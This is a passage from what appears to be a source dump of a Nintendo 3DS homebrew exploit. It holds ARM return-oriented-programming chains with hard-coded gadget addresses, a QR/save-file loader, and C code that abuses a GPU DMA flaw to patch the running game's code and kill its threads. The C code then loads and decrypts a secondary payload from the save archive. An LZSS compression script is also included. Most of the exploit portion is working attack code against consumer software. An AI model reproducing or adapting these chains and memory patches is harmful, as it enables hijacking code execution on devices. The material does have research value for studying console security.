170 | 			.word 0xDEADC0DE ; r0 (garbage)
171 | 
172 | 	;copy garbage to framebuffer
173 | 		.word 0x002d2b18 ; pop {r0, pc}
174 | 			.word CN_TOPFBADR1+0x46500/2    ; r0 (dst)
175 | 		.word 0x0022b2bc ; pop	{r1, pc}
176 | 			.word 0x00100000+CN_INITIALCODE_OFFSET ; r1 (src)
177 | 		.word 0x0010fc14 ; pop	{r2, r3, r4, pc}
178 | 			.word 0x46500/2 ; r2 (size)
179 | 			.word 0xDEADC0DE ; r3 (garbage)
180 | 			.word 0xDEADC0DE ; r4 (garbage)
181 | 		.word 0x00229B38 ; memcpy (ends in BX LR)
182 | 		;equivalent to .word 0x002d2b18 ; pop {r0, pc}
183 | 			.word 0xDEADC0DE ; r0 (garbage)
184 | 
185 | 	;copy garbage to framebuffer
186 | 		.word 0x002d2b18 ; pop {r0, pc}
187 | 			.word CN_TOPFBADR2+0x46500/2    ; r0 (dst)
188 | 		.word 0x0022b2bc ; pop	{r1, pc}
189 | 			.word 0x00100000+CN_INITIALCODE_OFFSET ; r1 (src)
190 | 		.word 0x0010fc14 ; pop	{r2, r3, r4, pc}
191 | 			.word 0x46500/2 ; r2 (size)
192 | 			.word 0xDEADC0DE ; r3 (garbage)
193 | 			.word 0xDEADC0DE ; r4 (garbage)
194 | 		.word 0x00229B38 ; memcpy (ends in BX LR)
195 | 		;equivalent to .word 0x002d2b18 ; pop {r0, pc}
196 | 			.word 0xDEADC0DE ; r0 (garbage)
197 | 
198 | 		.word 0x00100000+CN_INITIALCODE_OFFSET ;jump to code
199 | 
200 | 		.word 0xBEEF0000
201 | endROP:
202 | 
203 | .align 4
204 | codePatch:
205 | 	.incbin "cn_initial/cn_initial.bin"
206 | codePatchEnd:
207 | 
208 | .Close
209 | 


--------------------------------------------------------------------------------
/cn_qr_initial_loader/JPN/sploit.s:
--------------------------------------------------------------------------------
  1 | .nds
  2 | 
  3 | .include "../../build/constants.s"
  4 | 
  5 | .open "sploit_proto.bin","cn_qr_initial_loader.bin",0x0
  6 | 
  7 | .arm
  8 | 
  9 | CN_GXCOMMAND_ADR equ (CN_GSPHEAP+0x000F0000)
 10 | CN_TMPVAR_ADR equ (CN_GSPHEAP+0x000E0000)
 11 | 
 12 | ;length
 13 | .orga 0x60
 14 | 	.word endROP-ROP+0xA8-0x64
 15 | 	; .word secondaryROP-ROP+0xA8-0x64
 16 | 
 17 | ;ROP
 18 | .orga 0xA8
 19 | ROP:
 20 | 	;jump to safer place
 21 | 		
 22 | 		.word 0x002d2b18 ; pop	{r0, pc}
 23 | 			.word 0x0FFFE368 ; r0 
 24 | 		.word 0x00272738 ; ldr r0, [r0] | pop {r4, pc}
 25 | 			.word 0x00000008 ; r4
 26 | 		.word 0x001e5ab0 ; add r0, r0, r4 | pop {r4, pc}
 27 | 			.word 0xDEADC0DE ; r4 (garbage)
 28 | 		.word 0x00272738 ; ldr r0, [r0] | pop {r4, pc}
 29 | 			.word CN_TMPVAR_ADR ; r4 (tmp var adr)
 30 | 		.word 0x0020096c ; str r0, [r4] | pop {r4, pc}
 31 | 			.word -(CN_STACKPAYLOADADR-0xA8) ; r4 (offset)
 32 | 		.word 0x001e5ab0 ; add r0, r0, r4 | pop {r4, pc}
 33 | 			.word CN_STACKPAYLOADADR+filePayloadOffset-ROP ; r4 (garbage)
 34 | 		.word 0x0020096c ; str r0, [r4] | pop {r4, pc}
 35 | 			.word 0xDEADC0DE ; r4 (garbage)
 36 | 		.word 0x001001c8 ; pop {r3} | add sp, sp, r3 | pop {pc}
 37 | 		filePayloadOffset:
 38 | 			.word 0xDEADC0DE ; r3 (garbage because gets overwritten by previous gadget)
 39 | 
 40 | secondaryROP:
 41 | 
 42 | 	;copy code to GSP heap
 43 | 		.word 0x001742ec ; pop {r3, pc}
 44 | 			.word 0x002d2b18 ; r3 (pop {r0, pc})
 45 | 		.word 0x00106ee8 ; pop {r4, lr} | bx r3
 46 | 			.word 0xDEADC0DE ; r4 (garbage)
 47 | 			.word 0x002d2b18 ; lr (pop	{r0, pc})
 48 | 		;equivalent to .word 0x002d2b18 ; pop {r0, pc}
 49 | 			.word CN_TMPVAR_ADR-4 ; r0 (tmp var)
 50 |   		.word 0x00271df8 ; ldr r1, [r0, #4] | add r0, r0, r1 | pop {r3, r4, r5, pc}
 51 | 			.word 0xDEADC0DE ; r3 (garbage)
 52 | 			.word 0xDEADC0DE ; r4 (garbage)
 53 | 			.word 0xDEADC0DE ; r5 (garbage)
 54 | 		.word 0x002d2b18 ; pop	{r0, pc}
 55 | 			.word CN_CODELOCATIONGSP-codePatch ; r0 (dst)
 56 | 		.word 0x0010fc14 ; pop	{r2, r3, r4, pc}
 57 | 			.word codePatchEnd ; r2 (size)
 58 | 			.word 0xDEADC0DE ; r3 (garbage)
 59 | 			.word 0xDEADC0DE ; r4 (garbage)
 60 | 		.word 0x00229B38 ; memcpy (ends in BX LR)
 61 | 
 62 | 	;flush data cache
 63 | 		;equivalent to .word 0x002d2b18 ; pop {r0, pc}
 64 | 			.word CN_GSPHANDLE_ADR ; r0 (handle ptr)
 65 | 		.word 0x0022b2bc ; pop	{r1, pc}
 66 | 			.word 0xFFFF8001 ; r1 (kprocess handle)
 67 | 		.word 0x0010fc14 ; pop	{r2, r3, r4, pc}
 68 | 			.word CN_CODELOCATIONGSP  ; r2 (address)
 69 | 			; .word codePatchEnd-codePatch ; r3 (size) ; beware cache flushing trouble...
 70 | 			.word 0x00010000 ; r3 (size)
 71 | 			.word 0xDEADC0DE ; r4 (garbage)
 72 | 		.word CN_GSPGPU_FlushDataCache_ADR+4 ; GSPGPU_FlushDataCache (ends in LDMFD SP!, {R4-R6,PC})
 73 | 			.word 0xDEADC0DE ; r4 (garbage)
 74 | 			.word 0xDEADC0DE ; r5 (garbage)
 75 | 			.word 0xDEADC0DE ; r6 (garbage)
 76 | 
 77 | 	;create GX command
 78 | 		.word 0x0027273C ; pop {r4, pc}
 79 | 
 80 | 			.word CN_GXCOMMAND_ADR+0x0 ; r4
 81 | 		.word 0x002d2b18 ; pop	{r0, pc}
 82 | 			.word 0x00000004
 83 | 		.word 0x0020096c ; str r0, [r4] | pop {r4, pc}
 84 | 
 85 | 			.word CN_GXCOMMAND_ADR+0x4 ; r4
 86 | 		.word 0x002d2b18 ; pop	{r0, pc}
 87 | 			.word CN_CODELOCATIONGSP
 88 | 		.word 0x0020096c ; str r0, [r4] | pop {r4, pc}
 89 | 
 90 | 			.word CN_GXCOMMAND_ADR+0x8 ; r4
 91 | 		.word 0x002d2b18 ; pop	{r0, pc}
 92 | 			.word CN_GSPHEAP+CN_TEXTPA_OFFSET_FROMEND+CN_INITIALCODE_OFFSET+FIRM_APPMEMALLOC ; r0
 93 | 		.word 0x0020096c ; str r0, [r4] | pop {r4, pc}
 94 | 
 95 | 			.word CN_GXCOMMAND_ADR+0xC ; r4
 96 | 		.word 0x002d2b18 ; pop	{r0, pc}
 97 | 			.word 0x00010000
 98 | 		.word 0x0020096c ; str r0, [r4] | pop {r4, pc}
 99 | 
100 | 			.word CN_GXCOMMAND_ADR+0x10 ; r4
101 | 		.word 0x002d2b18 ; pop	{r0, pc}
102 | 			.word 0x00000000
103 | 		.word 0x0020096c ; str r0, [r4] | pop {r4, pc}
104 | 
105 | 			.word CN_GXCOMMAND_ADR+0x14 ; r4
106 | 		.word 0x0020096c ; str r0, [r4] | pop {r4, pc}
107 | 			
108 | 			.word CN_GXCOMMAND_ADR+0x18 ; r4
109 | 		.word 0x002d2b18 ; pop	{r0, pc}
110 | 			.word 0x00000008
111 | 		.word 0x0020096c ; str r0, [r4] | pop {r4, pc}
112 | 
113 | 			.word CN_GXCOMMAND_ADR+0x1C ; r4
114 | 		.word 0x002d2b18 ; pop	{r0, pc}
115 | 			.word 0x00000000
116 | 		.word 0x0020096c ; str r0, [r4] | pop {r4, pc}
117 | 			.word 0xDEADC0DE ; r4 (garbage)
118 | 
119 | 	;send GX command
120 | 		.word 0x002d2b18 ; pop	{r0, pc}
121 | 			.word CN_GSPSHAREDBUF_ADR ; r0
122 | 		.word 0x0022b2bc ; pop	{r1, pc}
123 | 			.word CN_GXCOMMAND_ADR ; r1 (cmd addr)
124 | 		.word CN_nn__gxlow__CTR__CmdReqQueueTx__TryEnqueue+4 ; nn__gxlow__CTR__CmdReqQueueTx__TryEnqueue (ends in LDMFD   SP!, {R4-R8,PC})
125 | 			.word 0xDEADC0DE ; r4 (garbage)
126 | 			.word 0xDEADC0DE ; r5 (garbage)
127 | 			.word 0xDEADC0DE ; r6 (garbage)
128 | 			.word 0xDEADC0DE ; r7 (garbage)
129 | 			.word 0xDEADC0DE ; r8 (garbage)
130 | 
131 | 	;sleep for a second and jump to code
132 | 		.word 0x001742ec ; pop {r3, pc}
133 | 			.word 0x002d2b18 ; r3 (pop {r0, pc})
134 | 		.word 0x00106ee8 ; pop {r4, lr} | bx r3
135 | 			.word 0xDEADC0DE ; r4 (garbage)
136 | 			.word 0x002d2b18 ; lr (pop {r0, pc})
137 | 		;equivalent to .word 0x002d2b18 ; pop {r0, pc}
138 | 			.word 0x3B9ACA00 ; r0 = 1 second
139 | 			; .word 0xFFFFFFFF ; r0 = forever
140 | 		.word 0x0022b2bc ; pop	{r1, pc}
141 | 			.word 0x00000000 ; r1
142 | 			; .word 0x0FFFFFFF ; r1 = forever
143 | 		.word 0x0029D7DC ; svcSleepThread (ends in BX LR)
144 | 		;equivalent to .word 0x002d2b18 ; pop {r0, pc}
145 | 			.word 0x00000000 ; r0 (time_low)
146 | 		.word 0x0022b2bc ; pop	{r1, pc}
147 | 			.word 0x00000000 ; r1 (time_high)
148 | 
149 | ; DEBUG !
150 | 	;copy garbage to framebuffer
151 | 		.word 0x002d2b18 ; pop {r0, pc}
152 | 			.word CN_TOPFBADR1    ; r0 (dst)
153 | 		.word 0x0022b2bc ; pop	{r1, pc}
154 | 			.word CN_CODELOCATIONGSP ; r1 (src)
155 | 		.word 0x0010fc14 ; pop	{r2, r3, r4, pc}
156 | 			.word 0x46500 ; r2 (size)
157 | 			.word 0xDEADC0DE ; r3 (garbage)
158 | 			.word 0xDEADC0DE ; r4 (garbage)
159 | 		.word 0x00229B38 ; memcpy (ends in BX LR)
160 | 		;equivalent to .word 0x002d2b18 ; pop {r0, pc}
161 | 			.word 0xDEADC0DE ; r0 (garbage)
162 | 
163 | 	;copy garbage to framebuffer
164 | 		.word 0x002d2b18 ; pop {r0, pc}
165 | 			.word CN_TOPFBADR2    ; r0 (dst)
166 | 		.word 0x0022b2bc ; pop	{r1, pc}
167 | 			.word CN_CODELOCATIONGSP ; r1 (src)
168 | 		.word 0x0010fc14 ; pop	{r2, r3, r4, pc}
169 | 			.word 0x46500 ; r2 (size)
170 | 			.word 0xDEADC0DE ; r3 (garbage)
171 | 			.word 0xDEADC0DE ; r4 (garbage)
172 | 		.word 0x00229B38 ; memcpy (ends in BX LR)
173 | 		;equivalent to .word 0x002d2b18 ; pop {r0, pc}
174 | 			.word 0xDEADC0DE ; r0 (garbage)
175 | 
176 | 	;copy garbage to framebuffer
177 | 		.word 0x002d2b18 ; pop {r0, pc}
178 | 			.word CN_TOPFBADR1+0x46500/2    ; r0 (dst)
179 | 		.word 0x0022b2bc ; pop	{r1, pc}
180 | 			.word 0x00100000+CN_INITIALCODE_OFFSET ; r1 (src)
181 | 		.word 0x0010fc14 ; pop	{r2, r3, r4, pc}
182 | 			.word 0x46500/2 ; r2 (size)
183 | 			.word 0xDEADC0DE ; r3 (garbage)
184 | 			.word 0xDEADC0DE ; r4 (garbage)
185 | 		.word 0x00229B38 ; memcpy (ends in BX LR)
186 | 		;equivalent to .word 0x002d2b18 ; pop {r0, pc}
187 | 			.word 0xDEADC0DE ; r0 (garbage)
188 | 
189 | 	;copy garbage to framebuffer
190 | 		.word 0x002d2b18 ; pop {r0, pc}
191 | 			.word CN_TOPFBADR2+0x46500/2    ; r0 (dst)
192 | 		.word 0x0022b2bc ; pop	{r1, pc}
193 | 			.word 0x00100000+CN_INITIALCODE_OFFSET ; r1 (src)
194 | 		.word 0x0010fc14 ; pop	{r2, r3, r4, pc}
195 | 			.word 0x46500/2 ; r2 (size)
196 | 			.word 0xDEADC0DE ; r3 (garbage)
197 | 			.word 0xDEADC0DE ; r4 (garbage)
198 | 		.word 0x00229B38 ; memcpy (ends in BX LR)
199 | 		;equivalent to .word 0x002d2b18 ; pop {r0, pc}
200 | 			.word 0xDEADC0DE ; r0 (garbage)
201 | 
202 | 		.word 0x00100000+CN_INITIALCODE_OFFSET ;jump to code
203 | 
204 | 		.word 0xBEEF0000
205 | endROP:
206 | 
207 | .align 4
208 | codePatch:
209 | 	.incbin "cn_initial/cn_initial.bin"
210 | 	.word 0xDEADDEAD
211 | 	.word 0xDEADDEAD
212 | 	.word 0xDEADDEAD
213 | 	.word 0xDEADDEAD
214 | codePatchEnd:
215 | 
216 | .Close
217 | 


--------------------------------------------------------------------------------
/scripts/compress.py:
--------------------------------------------------------------------------------
  1 | # used http://code.google.com/p/u-lzss/source/browse/trunk/js/lib/ulzss.js as
  2 | # a guide
  3 | from sys import stderr
  4 | 
  5 | from collections import defaultdict
  6 | from operator import itemgetter
  7 | from struct import pack, unpack
  8 | 
  9 | class SlidingWindow:
 10 |     # The size of the sliding window
 11 |     size = 4096
 12 | 
 13 |     # The minimum displacement.
 14 |     disp_min = 2
 15 | 
 16 |     # The hard minimum ; a disp less than this can't be represented in the
 17 |     # compressed stream.
 18 |     disp_start = 1
 19 | 
 20 |     # The minimum length for a successful match in the window
 21 |     match_min = 1
 22 | 
 23 |     # The maximum length of a successful match, inclusive.
 24 |     match_max = None
 25 | 
 26 |     def __init__(self, buf):
 27 |         self.data = buf
 28 |         self.hash = defaultdict(list)
 29 |         self.full = False
 30 | 
 31 |         self.start = 0
 32 |         self.stop = 0
 33 |         #self.index = self.disp_min - 1
 34 |         self.index = 0
 35 | 
 36 |         assert self.match_max is not None
 37 | 
 38 |     def next(self):
 39 |         if self.index < self.disp_start - 1:
 40 |             self.index += 1
 41 |             return
 42 | 
 43 |         if self.full:
 44 |             olditem = self.data[self.start]
 45 |             assert self.hash[olditem][0] == self.start
 46 |             self.hash[olditem].pop(0)
 47 | 
 48 |         item = self.data[self.stop]
 49 |         self.hash[item].append(self.stop)
 50 |         self.stop += 1
 51 |         self.index += 1
 52 | 
 53 |         if self.full:
 54 |             self.start += 1
 55 |         else:
 56 |             if self.size <= self.stop:
 57 |                 self.full = True
 58 | 
 59 |     def advance(self, n=1):
 60 |         """Advance the window by n bytes"""
 61 |         for _ in range(n):
 62 |             self.next()
 63 | 
 64 |     def search(self):
 65 |         match_max = self.match_max
 66 |         match_min = self.match_min
 67 | 
 68 |         counts = []
 69 |         indices = self.hash[self.data[self.index]]
 70 |         for i in indices:
 71 |             matchlen = self.match(i, self.index)
 72 |             if matchlen >= match_min:
 73 |                 disp = self.index - i
 74 |                 #assert self.index - disp >= 0
 75 |                 #assert self.disp_min <= disp < self.size + self.disp_min
 76 |                 if self.disp_min <= disp:
 77 |                     counts.append((matchlen, -disp))
 78 |                     if matchlen >= match_max:
 79 |                         #assert matchlen == match_max
 80 |                         return counts[-1]
 81 | 
 82 |         if counts:
 83 |             match = max(counts, key=itemgetter(0))
 84 |             return match
 85 | 
 86 |         return None
 87 | 
 88 |     def match(self, start, bufstart):
 89 |         size = self.index - start
 90 | 
 91 |         if size == 0:
 92 |             return 0
 93 | 
 94 |         matchlen = 0
 95 |         it = range(min(len(self.data) - bufstart, self.match_max))
 96 |         for i in it:
 97 |             if self.data[start + (i % size)] == self.data[bufstart + i]:
 98 |                 matchlen += 1
 99 |             else:
100 |                 break
101 |         return matchlen
102 | 
103 | class NLZ10Window(SlidingWindow):
104 |     size = 4096
105 | 
106 |     match_min = 3
107 |     match_max = 3 + 0xf
108 | 
109 | class NLZ11Window(SlidingWindow):
110 |     size = 4096
111 | 
112 |     match_min = 3
113 |     match_max = 0x111 + 0xFFFF
114 | 
115 | class NOverlayWindow(NLZ10Window):
116 |     disp_min = 3
117 | 
118 | def _compress(input, windowclass=NLZ10Window):
119 |     """Generates a stream of tokens. Either a byte (int) or a tuple of (count,
120 |     displacement)."""
121 | 
122 |     window = windowclass(input)
123 | 
124 |     i = 0
125 |     while True:
126 |         if len(input) <= i:
127 |             break
128 |         match = window.search()
129 |         if match:
130 |             yield match
131 |             #if match[1] == -283:
132 |             #    raise Exception(match, i)
133 |             window.advance(match[0])
134 |             i += match[0]
135 |         else:
136 |             yield input[i]
137 |             window.next()
138 |             i += 1
139 | 
140 | def packflags(flags):
141 |     n = 0
142 |     for i in range(8):
143 |         n <<= 1
144 |         try:
145 |             if flags[i]:
146 |                 n |= 1
147 |         except IndexError:
148 |             pass
149 |     return n
150 | 
151 | def chunkit(it, n):
152 |     buf = []
153 |     for x in it:
154 |         buf.append(x)
155 |         if n <= len(buf):
156 |             yield buf
157 |             buf = []
158 |     if buf:
159 |         yield buf
160 | 
161 | def compress(input, out):
162 |     # header
163 |     out.write(pack("<L", (len(input) << 8) + 0x10))
164 | 
165 |     # body
166 |     length = 0
167 |     for tokens in chunkit(_compress(input), 8):
168 |         flags = [type(t) == tuple for t in tokens]
169 |         out.write(pack(">B", packflags(flags)))
170 | 
171 |         for t in tokens:
172 |             if type(t) == tuple:
173 |                 count, disp = t
174 |                 count -= 3
175 |                 disp = (-disp) - 1
176 |                 assert 0 <= disp < 4096
177 |                 sh = (count << 12) | disp
178 |                 out.write(pack(">H", sh))
179 |             else:
180 |                 out.write(pack(">B", t))
181 | 
182 |         length += 1
183 |         length += sum(2 if f else 1 for f in flags)
184 | 
185 |     # padding
186 |     padding = 8 - ((length+7+4) % 8)
187 |     if padding:
188 |         out.write(b'\x00' * padding)
189 |     # # padding
190 |     # padding = 4 - (length % 4 or 4)
191 |     # if padding:
192 |     #     out.write(b'\xff' * padding)
193 | 
194 |     return padding
195 | 
196 | def compress_nlz11(input, out):
197 |     # header
198 |     out.write(pack("<L", (len(input) << 8) + 0x11))
199 | 
200 |     # body
201 |     length = 0
202 |     for tokens in chunkit(_compress(input, windowclass=NLZ11Window), 8):
203 |         flags = [type(t) == tuple for t in tokens]
204 |         out.write(pack(">B", packflags(flags)))
205 |         length += 1
206 | 
207 |         for t in tokens:
208 |             if type(t) == tuple:
209 |                 count, disp = t
210 |                 disp = (-disp) - 1
211 |                 #if disp == 282:
212 |                 #    raise Exception
213 |                 assert 0 <= disp <= 0xFFF
214 |                 if count <= 1 + 0xF:
215 |                     count -= 1
216 |                     assert 2 <= count <= 0xF
217 |                     sh = (count << 12) | disp
218 |                     out.write(pack(">H", sh))
219 |                     length += 2
220 |                 elif count <= 0x11 + 0xFF:
221 |                     count -= 0x11
222 |                     assert 0 <= count <= 0xFF
223 |                     b = count >> 4
224 |                     sh = ((count & 0xF) << 12) | disp
225 |                     out.write(pack(">BH", b, sh))
226 |                     length += 3
227 |                 elif count <= 0x111 + 0xFFFF:
228 |                     count -= 0x111
229 |                     assert 0 <= count <= 0xFFFF
230 |                     l = (1 << 28) | (count << 12) | disp
231 |                     out.write(pack(">L", l))
232 |                     length += 4
233 |                 else:
234 |                     raise ValueError(count)
235 |             else:
236 |                 out.write(pack(">B", t))
237 |                 length += 1
238 | 
239 |     # padding
240 |     padding = 4 - (length % 4 or 4)
241 |     if padding:
242 |         out.write(b'\xff' * padding)
243 | 
244 | def dump_compress_nlz11(input, out):
245 |     # body
246 |     length = 0
247 |     def dump():
248 |         for t in _compress(input, windowclass=NLZ11Window):
249 |             if type(t) == tuple:
250 |                 yield t
251 |     from pprint import pprint
252 |     pprint(list(dump()))
253 | 
254 | # if __name__ == '__main__':
255 | #     from sys import stdout, argv
256 | #     data = open(argv[1], "rb").read()
257 | #     stdout = stdout.detach()
258 | #     #compress(data, stdout)
259 | #     compress_nlz11(data, stdout)
260 | 
261 | #     #dump_compress_nlz11(data, stdout)
262 | 


--------------------------------------------------------------------------------
/cn_save_initial_loader/WEST/cn_initial/source/main.c:
--------------------------------------------------------------------------------
  1 | #include <stdlib.h>
  2 | #include <stdio.h>
  3 | #include <string.h>
  4 | #include <ctr/types.h>
  5 | #include <ctr/srv.h>
  6 | #include <ctr/svc.h>
  7 | #include <ctr/FS.h>
  8 | #include "text.h"
  9 | 
 10 | #include "../../../../build/constants.h"
 11 | 
 12 | int _strlen(char* str)
 13 | {
 14 | 	int l=0;
 15 | 	while(*(str++))l++;
 16 | 	return l;
 17 | }
 18 | 
 19 | void _strcpy(char* dst, char* src)
 20 | {
 21 | 	while(*src)*(dst++)=*(src++);
 22 | 	*dst=0x00;
 23 | }
 24 | 
 25 | Result _srv_getServiceHandle(Handle* handleptr, Handle* out, char* server)
 26 | {
 27 | 	u8 l=_strlen(server);
 28 | 	if(!out || !server || l>8)return -1;
 29 | 
 30 | 	u32* cmdbuf=getThreadCommandBuffer();
 31 | 
 32 | 	cmdbuf[0]=0x50100; //request header code
 33 | 	_strcpy((char*)&cmdbuf[1], server);
 34 | 	cmdbuf[3]=l;
 35 | 	cmdbuf[4]=0x0;
 36 | 
 37 | 	Result ret=0;
 38 | 	if((ret=svc_sendSyncRequest(*handleptr)))return ret;
 39 | 
 40 | 	*out=cmdbuf[3];
 41 | 
 42 | 	return cmdbuf[1];
 43 | }
 44 | 
 45 | // const u8 hexTable[]=
 46 | // {
 47 | // 	'0', '1', '2', '3', '4', '5', '6', '7', '8', '9', 'a', 'b', 'c', 'd', 'e', 'f'
 48 | // };
 49 | 
 50 | // void hex2str(char* out, u32 val)
 51 | // {
 52 | // 	int i;
 53 | // 	for(i=0;i<8;i++){out[7-i]=hexTable[val&0xf];val>>=4;}
 54 | // 	out[8]=0x00;
 55 | // }
 56 | 
 57 | // void drawHex(u32 val, int x, int y)
 58 | // {
 59 | // 	char str[9];
 60 | 
 61 | // 	hex2str(str,val);
 62 | // 	drawString(CN_TOPFBADR1,str,x,y);
 63 | // 	drawString(CN_TOPFBADR2,str,x,y);
 64 | // }
 65 | 
 66 | void doGspwn(u32* src, u32* dst, u32 size)
 67 | {
 68 | 	Result (*nn__gxlow__CTR__CmdReqQueueTx__TryEnqueue)(u32** sharedGspCmdBuf, u32* cmdAdr)=(void*)0x001C2B54;
 69 | 	u32 gxCommand[]=
 70 | 	{
 71 | 		0x00000004, //command header (SetTextureCopy)
 72 | 		(u32)src, //source address
 73 | 		(u32)dst, //destination address
 74 | 		size, //size
 75 | 		0xFFFFFFFF, // dim in
 76 | 		0xFFFFFFFF, // dim out
 77 | 		0x00000008, // flags
 78 | 		0x00000000, //unused
 79 | 	};
 80 | 
 81 | 	u32** sharedGspCmdBuf=(u32**)(0x356208+0x58);
 82 | 	nn__gxlow__CTR__CmdReqQueueTx__TryEnqueue(sharedGspCmdBuf, gxCommand);
 83 | }
 84 | 
 85 | Result _GSPGPU_InvalidateDataCache(Handle* handle, Handle kprocess, u32* addr, u32 size)
 86 | {
 87 | 	u32* cmdbuf=getThreadCommandBuffer();
 88 | 
 89 | 	cmdbuf[0]=0x00090082;
 90 | 	cmdbuf[1]=(u32)addr;
 91 | 	cmdbuf[2]=size;
 92 | 	cmdbuf[3]=0x00000000;
 93 | 	cmdbuf[4]=(u32)kprocess;
 94 | 
 95 | 	Result ret=0;
 96 | 	if((ret=svc_sendSyncRequest(*handle)))return ret;
 97 | 
 98 | 	return cmdbuf[1];
 99 | }
100 | 
101 | void patchMem(Handle* gspHandle, u32 dst, u32 size, u32 start, u32 end)
102 | {
103 | 	Result (*_GSPGPU_FlushDataCache)(Handle* handle, Handle kprocess, u32* addr, u32 size)=(void*)CN_GSPGPU_FlushDataCache_ADR;
104 | 
105 | 	int i;
106 | 	_GSPGPU_InvalidateDataCache(gspHandle, 0xFFFF8001, (u32*)0x14100000, 0x200);
107 | 	doGspwn((u32*)(dst), (u32*)(0x14100000), 0x200);
108 | 	svc_sleepThread(0x100000);
109 | 	for(i=start;i<end;i++)((u32*)0x14100000)[i]=0xEF000009;
110 | 	_GSPGPU_FlushDataCache(gspHandle, 0xFFFF8001, (u32*)0x14100000, 0x200);
111 | 	doGspwn((u32*)(0x14100000), (u32*)(dst), 0x200);
112 | 	svc_sleepThread(0x100000);
113 | }
114 | 
115 | Result _FSUSER_OpenFileDirectly(Handle* handle, Handle* out, FS_archive archive, FS_path fileLowPath, u32 openflags, u32 attributes) //no need to have archive opened
116 | {
117 | 	u32* cmdbuf=getThreadCommandBuffer();
118 | 
119 | 	cmdbuf[0]=0x08030204;
120 | 	cmdbuf[1]=0;
121 | 	cmdbuf[2]=archive.id;
122 | 	cmdbuf[3]=archive.lowPath.type;
123 | 	cmdbuf[4]=archive.lowPath.size;
124 | 	cmdbuf[5]=fileLowPath.type;
125 | 	cmdbuf[6]=fileLowPath.size;
126 | 	cmdbuf[7]=openflags;
127 | 	cmdbuf[8]=attributes;
128 | 	cmdbuf[9]=(archive.lowPath.size<<14)|0x802;
129 | 	cmdbuf[10]=(u32)archive.lowPath.data;
130 | 	cmdbuf[11]=(fileLowPath.size<<14)|2;
131 | 	cmdbuf[12]=(u32)fileLowPath.data;
132 |  
133 | 	Result ret=0;
134 | 	if((ret=svc_sendSyncRequest(*handle)))return ret;
135 |  
136 | 	if(out)*out=cmdbuf[3];
137 |  
138 | 	return cmdbuf[1];
139 | }
140 | 
141 | Result _FSFILE_Close(Handle handle)
142 | {
143 | 	u32* cmdbuf=getThreadCommandBuffer();
144 | 
145 | 	cmdbuf[0]=0x08080000;
146 | 
147 | 	Result ret=0;
148 | 	if((ret=svc_sendSyncRequest(handle)))return ret;
149 | 
150 | 	return cmdbuf[1];
151 | }
152 | 
153 | Result _FSFILE_Read(Handle handle, u32 *bytesRead, u64 offset, u32 *buffer, u32 size)
154 | {
155 | 	u32 *cmdbuf=getThreadCommandBuffer();
156 |  
157 | 	cmdbuf[0]=0x080200C2;
158 | 	cmdbuf[1]=(u32)offset;
159 | 	cmdbuf[2]=(u32)(offset>>32);
160 | 	cmdbuf[3]=size;
161 | 	cmdbuf[4]=(size<<4)|12;
162 | 	cmdbuf[5]=(u32)buffer;
163 |  
164 | 	Result ret=0;
165 | 	if((ret=svc_sendSyncRequest(handle)))return ret;
166 | 
167 | 	if(bytesRead)*bytesRead=cmdbuf[2];
168 | 
169 | 	return cmdbuf[1];
170 | }
171 | 
172 | u32 computeCodeAddress(u32 offset)
173 | {
174 | 	return CN_GSPHEAP+CN_TEXTPA_OFFSET_FROMEND+FIRM_APPMEMALLOC+offset;
175 | }
176 | 
177 | int _main()
178 | {
179 | 	Handle* gspHandle=(Handle*)CN_GSPHANDLE_ADR;
180 | 	Result (*_GSPGPU_FlushDataCache)(Handle* handle, Handle kprocess, u32* addr, u32 size)=(void*)CN_GSPGPU_FlushDataCache_ADR;
181 | 
182 | 	// drawString(CN_TOPFBADR1,"ninjhaxx",0,0);
183 | 	// drawString(CN_TOPFBADR2,"ninjhaxx",0,0);
184 | 
185 | 	Handle* srvHandle=(Handle*)CN_SRVHANDLE_ADR;
186 | 
187 | 	int line=10;
188 | 	Result ret;
189 | 
190 | 	Handle* addressArbiterHandle=(Handle*)0x334960;
191 | 
192 | 	Result (*_DSP_UnloadComponent)(Handle* handle)=(void*)0x002BA368;
193 | 	Handle** dspHandle=(Handle**)0x334EFC;
194 | 
195 | 	_DSP_UnloadComponent(*dspHandle);
196 | 
197 | 	//close threads
198 | 		//patch gsp event handler addr to kill gsp thread ASAP
199 | 		*((u32*)(0x356208+0x10+4*0x4))=0x002ABEDC; //svc 0x9 addr
200 | 
201 | 		//patch waitSyncN
202 | 		patchMem(gspHandle, computeCodeAddress(0x00192200), 0x200, 0x19, 0x4F);
203 | 		patchMem(gspHandle, computeCodeAddress(0x00192600), 0x200, 0x7, 0x13);
204 | 		patchMem(gspHandle, computeCodeAddress(0x001CA200), 0x200, 0xB, 0x1E);
205 | 		// patchMem(gspHandle, computeCodeAddress(0x000C6100), 0x200, 0x3C, 0x52);
206 | 
207 | 		//patch arbitrateAddress
208 | 		patchMem(gspHandle, computeCodeAddress(0x001C9E00), 0x200, 0x14, 0x40);
209 | 
210 | 		//wake threads
211 | 		svc_arbitrateAddress(*addressArbiterHandle, 0x35811c, 0, -1, 0);
212 | 		svc_signalEvent(((Handle*)0x3480d0)[2]);
213 | 		s32 out; svc_releaseSemaphore(&out, *(Handle*)0x357490, 1);
214 | 
215 | 		//kill thread5 without panicking the kernel...
216 | 		*(u8*)0x359935=0x00;
217 | 
218 | 	svc_sleepThread(0x10000000);
219 | 
220 | 	//load secondary payload
221 | 	u32 secondaryPayloadSize;
222 | 	{
223 | 		Result ret;
224 | 		Handle* fsuHandle=(Handle*)CN_FSHANDLE_ADR;
225 | 		FS_archive saveArchive=(FS_archive){0x00000004, (FS_path){PATH_EMPTY, 1, (u8*)""}};
226 | 
227 | 		//write secondary payload file
228 | 		Handle fileHandle;
229 | 		ret=_FSUSER_OpenFileDirectly(fsuHandle, &fileHandle, saveArchive, FS_makePath(PATH_CHAR, "/edit/payload.bin"), FS_OPEN_READ, FS_ATTRIBUTE_NONE);
230 | 		if(ret)*(u32*)NULL=0xC0DF0002;
231 | 		ret=_FSFILE_Read(fileHandle, &secondaryPayloadSize, 0x0, (u32*)0x14100000, 0x00011000);
232 | 		if(ret)*(u32*)NULL=0xC0DF0003;
233 | 		ret=_FSFILE_Close(fileHandle);
234 | 		if(ret)*(u32*)NULL=0xC0DF0004;
235 | 	}
236 | 
237 | 	//decrypt it
238 | 	{
239 | 		Result (*blowfishKeyScheduler)(u32* dst)=(void*)0x001A44BC;
240 | 		Result (*blowfishDecrypt)(u32* blowfishKeyData, u32* src, u32* dst, u32 size)=(void*)0x001A4B04;
241 | 
